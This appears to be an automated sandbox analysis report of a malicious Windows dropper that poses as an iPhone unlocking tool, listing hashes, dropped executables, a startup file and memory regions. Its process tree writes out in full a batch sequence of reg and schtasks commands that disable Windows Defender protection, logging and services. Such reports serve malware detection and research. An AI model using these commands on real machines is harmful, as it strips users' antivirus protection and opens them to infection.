Analysis

  • max time kernel
    151s
  • max time network
    85s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16-01-2023 21:46

General

  • Target

    F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe

  • Size

    16.0MB

  • MD5

    0f007d899ab6ef50e71a1acfd1ab4147

  • SHA1

    6cbb099844201db58f34f41720b001f6e10d6197

  • SHA256

    f816ea850eca0a23b99541054eddc2ac01971bb502dcf1231dc02ed58282365f

  • SHA512

    a49c5898e060c0bf5e35608740c2317283e6f13d6f70bc62b1648689e7ba19e83d3c8b179aa1f37b0a57469edc75e30b1d0f93b4b065f361627a6e64065bc91c

  • SSDEEP

    393216:T3HBq+lXKkz4XNC6JMxBEMYUUwE+hxRgNqw+VNdT0Qxq+I:jVdxwNC6JgBEIzD/gkfVPZVI

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
    "C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe
      "C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1900
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D84.tmp\6D85.tmp\6D86.bat C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
          4⤵
            PID:1636
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            4⤵
              PID:2008
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              4⤵
                PID:1524
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                4⤵
                  PID:2200
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  4⤵
                    PID:4264
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3172
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3436
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:628
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:2420
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3884
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1824
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:3024
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                        4⤵
                          PID:2972
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                          4⤵
                            PID:3680
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            4⤵
                              PID:3324
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                              4⤵
                                PID:4468
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                4⤵
                                  PID:316
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                  4⤵
                                    PID:4284
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                    4⤵
                                      PID:3776
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                      4⤵
                                        PID:4396
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                        4⤵
                                          PID:4204
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                          4⤵
                                            PID:4152
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                            4⤵
                                              PID:2620
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                              4⤵
                                                PID:3220
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                4⤵
                                                  PID:3304
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                  4⤵
                                                    PID:2012
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                    4⤵
                                                      PID:3432
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                      4⤵
                                                        PID:2768
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                        4⤵
                                                          PID:5024
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                          4⤵
                                                            PID:1048
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies security service
                                                            PID:1540
                                                      • C:\Users\Admin\AppData\Roaming\NanWin.exe
                                                        "C:\Users\Admin\AppData\Roaming\NanWin.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops startup file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2216
                                                      • C:\Users\Admin\AppData\Roaming\ParaWin.exe
                                                        "C:\Users\Admin\AppData\Roaming\ParaWin.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops startup file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4580
                                                      • C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe
                                                        "C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4628
                                                        • C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp" /SL5="$E004A,15327349,546304,C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1648

Network

MITRE ATT&CK Enterprise v6

Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\6D84.tmp\6D85.tmp\6D86.bat

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      35b74dad14475b9684b5afa31b75f3fa

                                                      SHA1

                                                      59c915df0361253e87d8e7fc24a7f45215949f44

                                                      SHA256

                                                      9d2bfa4eb93d0026edafa2f6fdc06faa591be4334f739adae413247a7019fe8b

                                                      SHA512

                                                      85383abab6052210425db6d6b139e504a786765dd7cb085991f8867c45932ab1a98bdfe77d737751c551b9c6c25de0d9fb5d9d41375deca43da327c306239590

                                                    • C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp

                                                      Filesize

                                                      1.5MB

                                                      MD5

                                                      844384b7d563f094910e2b986ded3320

                                                      SHA1

                                                      df9661693cb55116b653dba682aa9819bee59849

                                                      SHA256

                                                      6eec90877ed23e5c8136c5d774ab13db441ae51730450b2fc15ef3d1ed8e982f

                                                      SHA512

                                                      a90a260c369158a8e55c460c60fe9ee92b8e36a8a839e7a0e6d5a17887e1166bd2b163a56fbbce330b0b3cd1209d711031d1303402e178837de5e4f230c62a4f

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe

                                                      Filesize

                                                      412KB

                                                      MD5

                                                      610696767503d1e65a0f00892ae76748

                                                      SHA1

                                                      f4c666cb6e6f85c702173eebfe0fedb74061f755

                                                      SHA256

                                                      a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1

                                                      SHA512

                                                      2fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de

                                                    • C:\Users\Admin\AppData\Roaming\NanWin.exe

                                                      Filesize

                                                      412KB

                                                      MD5

                                                      610696767503d1e65a0f00892ae76748

                                                      SHA1

                                                      f4c666cb6e6f85c702173eebfe0fedb74061f755

                                                      SHA256

                                                      a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1

                                                      SHA512

                                                      2fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de

                                                    • C:\Users\Admin\AppData\Roaming\ParaWin.exe

                                                      Filesize

                                                      335KB

                                                      MD5

                                                      0335dc59409a50d9dd55bf2c103be4a3

                                                      SHA1

                                                      74a326b31f47b5acce81d057345379296efb3a8c

                                                      SHA256

                                                      829b0a54123b9105d688a6592ddf830f798f467c536c9f0833c7d4c0ae02d9a7

                                                      SHA512

                                                      ebf2022a8c71d46249d2ff3a2f54712e623697bff5614e24d8d06551ed332cb43af2fc3dd06490b26d9f484e99bb4579e07fad8c3a7c19a9d101a06244e7ca59

                                                    • C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe

                                                      Filesize

                                                      20.0MB

                                                      MD5

                                                      8c5dd78ab39b61f7d55b15bb283df424

                                                      SHA1

                                                      cd695484bdb7fbce5cd223159fbdd36a336f4914

                                                      SHA256

                                                      5769ccef917fe78906c41ae332f08429401798483fa47a61fd8f90c77a2a3ce8

                                                      SHA512

                                                      f9b063c91baf3548448ce2476337789d591e88d376a3c7530fd36006980a1a0fea23b6298d50e3264ff25507d337a54d8db4910a1754be2c7701f4f27a7cc423

                                                    • C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe

                                                      Filesize

                                                      15.1MB

                                                      MD5

                                                      48c26c1d7339c99e2c0dbba5af874176

                                                      SHA1

                                                      547a9984003102d58dacc176621ce00d09e00728

                                                      SHA256

                                                      94ea3520cfba9ac746b552df843e682cf6d2b11627759a216bd83aa95714c782

                                                      SHA512

                                                      d42d9bf7ca36268f3ee75234f61b36ed720fe25e3c0fe322531c3dace91d33b5f5b37ab7ba2cf76c46dfdb04341e8ae01961280e7ded14d92e9609197da8861e

                                                    • memory/2216-155-0x0000000004EB0000-0x0000000004F42000-memory.dmp

                                                      Filesize

                                                      584KB

                                                    • memory/2216-148-0x00000000005A0000-0x000000000060E000-memory.dmp

                                                      Filesize

                                                      440KB

                                                    • memory/2216-151-0x0000000005550000-0x0000000005AF4000-memory.dmp

                                                      Filesize

                                                      5.6MB

                                                    • memory/4580-162-0x00000000058B0000-0x0000000005916000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/4580-159-0x00000000055B0000-0x000000000564C000-memory.dmp

                                                      Filesize

                                                      624KB

                                                    • memory/4580-149-0x0000000000AA0000-0x0000000000AFC000-memory.dmp

                                                      Filesize

                                                      368KB

                                                    • memory/4628-158-0x0000000000400000-0x000000000048F000-memory.dmp

                                                      Filesize

                                                      572KB

                                                    • memory/4628-189-0x0000000000400000-0x000000000048F000-memory.dmp

                                                      Filesize

                                                      572KB

                                                    • memory/4628-146-0x0000000000400000-0x000000000048F000-memory.dmp

                                                      Filesize

                                                      572KB